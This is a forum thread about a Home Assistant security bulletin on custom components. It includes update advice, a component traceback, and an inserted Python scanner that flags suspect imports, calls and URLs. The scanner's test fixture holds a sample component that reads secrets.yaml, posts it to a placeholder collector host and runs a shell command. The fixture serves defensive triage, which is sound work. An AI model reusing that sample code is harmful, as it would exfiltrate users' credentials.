Security Bulletin

“Hass.io” is not a term we use anymore. It was ambiguous by itself as well.

This is a new release of the Home Assistant Core application, which runs on all, no matter which installation method you use.

3 Likes

My Supervisor menu isn’t showing any available updates. Is there a way to force the check? I already followed directions to click the Reload on the System tab to no avail.

You can use the SSH add-on:

ha core update --version 2021.1.2

It should be available though… I got a notification a few hours ago

1 Like

I don’t know what it is about my setup, but at times I don’t get notifications for a week or two. The only way I can reliably force the notification to appear is to reboot the host, which is rather heavy-handed for my liking.

While “disable all your custom components” is prudent until the risk is analysed, “all custom components run at your own risk” does not work for me as a security posture.

Moving forward can we please get some clarity from the developers over exactly what reach into the home assistant environment, config files etc a custom component (not an add on) has and where it’s restricted?

Thank you

3 Likes

Are you saying you think a custom component shouldn’t be able to read configuration.yaml?

If so, how would you configure a custom component?

If you meant something else, my apologies.

3 Likes

Do you think it might be an idea to put the pitchforks down and wait for more information which is surely forthcoming?

27 Likes

This should also be posted on https://alerts.home-assistant.io/

Is this why Alexa sensors {timer, alarm, etc.} are no longer available?

Doesn’t this functionality already exist? Add-ons for one have separate config files. Integrations can be configured in a separate yaml file. Name the file integration_name.yaml then add

integration_name: !include integration_name.yaml

in config.yaml.

Or am I misunderstanding the use of setting up individual configs this way? I just assumed this would limit an integration to only its own config file.

For organization, not security.

Files can be separated to make them more human-readable and to allow the config to be split up in a manner logical to the user.

Nothing to do with security.

secrets.yaml was for security: remove passwords from the config. Not sure how access to it is managed for integrations.

2 Likes

secrets.yaml is just a text file to store your passwords etc. so that you can exclude the file from being uploaded to git or shared. There isn’t any security on this file, I believe.

Storing secrets - Home Assistant (home-assistant.io)

4 Likes

Lucky you, it’s cold here (US) in most of the states. :slight_smile: Enjoy your weather!

I thought you may have been in Aus too with the Kangaroo name.

3 Likes

Is there “a list” of components already available?

After the update I get the below. Does that mean that the custom component was leaking?

Logger: homeassistant.setup
Source: custom_components/midea_dehumidifier/__init__.py:66
First occurred: 8:47:00 AM (1 occurrences)
Last logged: 8:47:00 AM
Error during setup of component midea_dehumidifier

Traceback (most recent call last):
  File "/usr/src/homeassistant/homeassistant/setup.py", line 213, in _async_setup_component
    result = await task
  File "/config/custom_components/midea_dehumidifier/__init__.py", line 66, in async_setup
    res = await hass.async_add_executor_job(client.login)
  File "/usr/local/lib/python3.8/concurrent/futures/thread.py", line 57, in run
    result = self.fn(*self.args, **self.kwargs)
  File "/usr/local/lib/python3.8/site-packages/midea_inventor_lib/midea_client.py", line 69, in login
    response = self.__api_request("/v1/user/login/id/get", {"loginAccount": self.email})
  File "/usr/local/lib/python3.8/site-packages/midea_inventor_lib/midea_client.py", line 585, in __api_request
    response = self.__send_api_request(path, args)
  File "/usr/local/lib/python3.8/site-packages/midea_inventor_lib/midea_client.py", line 596, in __send_api_request
    data = response.json()
  File "/usr/local/lib/python3.8/site-packages/requests/models.py", line 900, in json
    return complexjson.loads(self.text, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/simplejson/__init__.py", line 525, in loads
    return _default_decoder.decode(s)
  File "/usr/local/lib/python3.8/site-packages/simplejson/decoder.py", line 370, in decode
    obj, end = self.raw_decode(s)
  File "/usr/local/lib/python3.8/site-packages/simplejson/decoder.py", line 400, in raw_decode
    return self.scan_once(s, idx=_w(s, idx).end())
simplejson.errors.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

And now we wait for more information. I get that @balloob is attempting to get in front of this issue with the update guidance but for many long term users, blindly updating isn’t feasible.

1 Like

Yet another reason to not fall too far behind and now get forced to update 10+ versions…

11 Likes

These are custom components running within your very instance of HA. Demanding “assumed” safeguards from unknown third-party code is akin to demanding car manufacturers guarantee the passenger of your car not be able to grab the steering wheel. Except in this case you just let people in the passenger seat because they look cool. Custom components run inside of HA. It is safe to assume, like your passenger, they have access to everything.

To be blunt, I think it’s rather rude to expect the core developers to vet every line of code of every custom component for safety free of charge. Do you know how much code that is?

10 Likes
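The posts above make the practical point that a custom component runs inside the Home Assistant process and should be assumed to have access to everything the process has, which leaves the user with the question of how to find out what an installed component actually does before deciding whether to disable it. The following is an added example, not code from Home Assistant or from any component mentioned in this thread: a static scan of `custom_components/` that parses each module with Python's `ast` and reports imports of process, filesystem and network modules, calls such as `open` and `subprocess.run`, and hard-coded URLs. The two components it scans (`good_weather` and `bad_cloud`) are constructed samples written into a temporary directory purely for the demonstration, and the lists of suspect modules and calls are the author's assumptions, not a standard.

```python
import ast
import re
import tempfile
from pathlib import Path

# Capabilities worth a second look in third-party code that shares the HA
# process. The lists are assumptions for this example, not an HA policy.
SUSPECT_MODULES = {"subprocess", "os", "socket", "ctypes", "pickle", "marshal"}
SUSPECT_CALLS = {
    "eval", "exec", "compile", "open", "__import__", "importlib.import_module",
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output",
}
URL_RE = re.compile(r"https?://[^\s'\"]+")


def _call_name(node: ast.Call) -> str:
    """Dotted name of the callee ('subprocess.run', 'open'), or '' if dynamic."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
        return ".".join(reversed(parts))
    return ""


def scan_source(src: str) -> dict:
    """Statically list suspect imports, calls and URLs in one Python module.

    The source is only parsed, never executed, so scanning untrusted code is safe.
    """
    findings = {"modules": set(), "calls": set(), "urls": set()}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            findings["modules"].update(
                a.name.split(".")[0] for a in node.names
                if a.name.split(".")[0] in SUSPECT_MODULES)
        elif isinstance(node, ast.ImportFrom) and node.module:
            root = node.module.split(".")[0]
            if root in SUSPECT_MODULES:
                findings["modules"].add(root)
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in SUSPECT_CALLS:
                findings["calls"].add(name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            findings["urls"].update(URL_RE.findall(node.value))
    return findings


def scan_custom_components(config_dir: str) -> dict:
    """Scan custom_components/<domain>/**/*.py under a HA config directory.

    Returns {domain: findings}; findings are merged across the domain's files.
    """
    report = {}
    root = Path(config_dir) / "custom_components"
    for domain_dir in sorted(p for p in root.iterdir() if p.is_dir()):
        merged = {"modules": set(), "calls": set(), "urls": set()}
        for py in domain_dir.rglob("*.py"):
            for key, val in scan_source(py.read_text(encoding="utf-8")).items():
                merged[key] |= val
        report[domain_dir.name] = merged
    return report


# Constructed sample components (hypothetical; they are parsed, never imported).
SAMPLE_BENIGN = '''\
import aiohttp

API = "https://api.example.com/v1/status"

async def async_setup(hass, config):
    async with aiohttp.ClientSession() as session:
        async with session.get(API) as resp:
            return resp.status == 200
'''

SAMPLE_SUSPICIOUS = '''\
import os
import subprocess
import requests

async def async_setup(hass, config):
    # reads the user's secrets.yaml from the config dir and ships it off-box
    with open(hass.config.path("secrets.yaml")) as fh:
        requests.post("https://collector.example.net/upload", data=fh.read())
    subprocess.run(["sh", "-c", "id"])
    return True
'''


def build_sample_config_dir() -> str:
    """Write the two constructed sample components into a temporary config dir."""
    cfg = tempfile.mkdtemp(prefix="ha-config-")
    for domain, src in (("good_weather", SAMPLE_BENIGN), ("bad_cloud", SAMPLE_SUSPICIOUS)):
        d = Path(cfg) / "custom_components" / domain
        d.mkdir(parents=True)
        (d / "__init__.py").write_text(src, encoding="utf-8")
    return cfg


def demo() -> dict:
    """Scan the constructed sample config directory and return the report."""
    return scan_custom_components(build_sample_config_dir())


if __name__ == "__main__":
    for domain, f in demo().items():
        print(f"{domain}: modules={sorted(f['modules'])} calls={sorted(f['calls'])} "
              f"urls={sorted(f['urls'])}")
```

To use it on a real system, call `scan_custom_components` with the actual config directory (on a supervised install that is normally `/config`, but check your own setup). A clean report is not proof of safety: dynamic imports, obfuscated strings and anything that happens inside a component's pip dependencies (such as the `midea_inventor_lib` package in the traceback earlier in this thread) are outside what a static scan of the component's own files can see. What it does answer quickly is the first triage question the thread is circling around: which installed components reach for the filesystem, spawn processes, or talk to endpoints you did not expect.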

And the alternative, banning custom components, would be a disaster.

7 Likes

Just like I wouldn’t blame Microsoft when I install suspicious software and it has a Trojan or virus in it.

3 Likes